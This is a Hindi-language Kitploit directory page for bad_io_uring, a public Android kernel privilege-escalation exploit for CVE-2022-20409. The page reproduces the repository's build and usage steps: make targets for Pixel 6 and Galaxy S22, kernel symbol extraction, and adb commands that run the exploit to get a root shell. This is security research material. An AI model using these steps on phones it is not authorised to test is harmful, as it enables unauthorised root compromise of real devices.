Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
bad_io_uring — एंड्रॉइड कर्नेल शोषण CVE-2022-20409 के लिए | Kitploit
उपकरण/GitHubGitHub/markakd/bad_io_uring
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षाबाइनरी शोषण
GitHubmarkakd/bad_io_uring

bad_io_uring

एंड्रॉइड कर्नेल शोषण CVE-2022-20409 के लिए

रिपॉजिटरी देखें
21330101 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Bad IO_uring

https://www.blackhat.com/us-23/briefings/schedule/index.html#bad-io_uring-a-new-era-of-rooting-for-android-32243

एक्सप्लॉइट बनाएं

सुनिश्चित करें कि Android NDK स्थापित है। pixel 6 के लिए,

make pixel

samsung s22 के लिए,

make s22

एक्सप्लॉइट का उपयोग कैसे करें

एक्सप्लॉइट विभिन्न कर्नेल संस्करणों का समर्थन करने के लिए लिखा गया है। एक्सप्लॉइट को किसी भिन्न कर्नेल पर पोर्ट करने के लिए, आपको लक्ष्य कर्नेल का सिम्बल फ़ाइल निकालना होगा।

कर्नेल को फोन की फैक्ट्री इमेज से निकाला जा सकता है। Pixels के लिए, फैक्ट्री इमेज यहाँ से डाउनलोड करें।

इमेज डाउनलोड करने के बाद, boot.img फ़ाइल प्राप्त करने के लिए इमेज को निकालें। boot.img को tools/unpack_bootimg.py से निकाला जा सकता है।

python3 tools/unpack_bootimg.py --boot_img boot.img --out out

आपको कर्नेल out/kernel पर दिखाई देगा।

अब, कर्नेल इमेज के साथ, हम vmlinux-to-elf का उपयोग करके इससे कर्नेल सिम्बल निकाल सकते हैं।

./tools/vmlinux-to-elf/kallsyms-finder out/kernel > pixel.kallsyms

आपको यह सुनिश्चित करना होगा कि सिम्बल में निकाला गया Version string आपके फोन के कर्नेल संस्करण से मेल खाता हो। फोन के कर्नेल संस्करण को adb के माध्यम से देखा जा सकता है। उदाहरण के लिए,

sh-3.2$ adb shell
oriole:/ $ uname -a
Linux localhost 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022 aarch64

मेल खाता है

[+] Version string: Linux version 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 (build-user@build-host) (Android (7284624, based on r416183b) clang version 12.0.5 (https://android.googlesource.com/toolchain/llvm-project c935d99d7cf2016289302412d708641d52d2f7ee), LLD 12.0.5 (/buildbot/src/android/llvm-toolchain/out/llvm-project/lld c935d99d7cf2016289302412d708641d52d2f7ee)) #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022

अब आप एक्सप्लॉइट और सिम्बल फ़ाइल को फोन पर पुश कर सकते हैं और निम्नलिखित कमांड के साथ इसे रूट कर सकते हैं।

make
adb push exp pixel.kallsyms /data/local/tmp
adb shell
cd /data/local/tmp
./exp pixel.kallsyms

अपने रूट शेल का आनंद लें :)

टूल डाउनलोड करें